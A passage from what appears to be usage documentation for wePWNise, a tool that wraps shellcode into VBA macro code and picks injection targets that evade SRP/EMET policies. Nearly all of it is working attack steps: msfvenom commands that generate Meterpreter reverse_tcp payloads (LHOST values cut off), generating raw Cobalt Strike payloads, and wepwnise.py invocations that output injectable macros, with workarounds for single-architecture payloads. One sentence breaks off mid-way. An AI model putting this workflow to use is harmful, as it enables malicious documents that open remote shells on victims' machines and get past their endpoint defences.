files (binary-paths.txt and directory-paths.txt) that contain a list of executables and directories which are less likely to be monitored and are checked first. By editing the contents of those files, the user can define their own choices instead. If the files are empty, wePWNise will directly start reading the SRPs/EMET policies as defined within the Registry and make its injection choice purely based on the retrieved information.
The following sections describe some basic usage examples of wePWNise.
First generate the payloads for both x86 and x64 architectures in raw format and ensure that the
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=
Then point wePWNise to the generated payloads and direct the output to msf_wepwn.txt.
$ wepwnise.py -i86 /payloads/msf86.raw -i64 /payloads/msf64.raw --out /payloads/msf_wepwn.txt
Cobalt Strike payloads
To generate a raw payload in Cobalt Strike, navigate to the following menu and from the Output dropdown select the Raw format. Repeat the process and enable the x64 checkbox to produce a 64-bit payload.
Attacks > Packages > Payload Generator
Enter the generated payloads into wePWNise to generate the VBA code.
$ wepwnise.py -i86 /payloads/cs86.raw -i64 /payloads/cs64.raw --msgbox False --out /payloads/cs_wepwn.txt
In certain cases only an x86 payload may be available. As wePWNise expects both a 32-bit and a 64-bit payload, to disable 64-bit injection create a dummy 64-bit file and set the --inject64 parameter to False.
$ echo "+" > /payloads/dummy64.raw
$ wepwnise.py -i86 /payloads/custom.raw -i64 /payloads/dummy64.raw --inject64 False --out /payloads/wepwn86.txt
Similarly, to generate 64-bit payloads only, create a dummy x86 file and supply it in wePWNise’s -i86 parameter.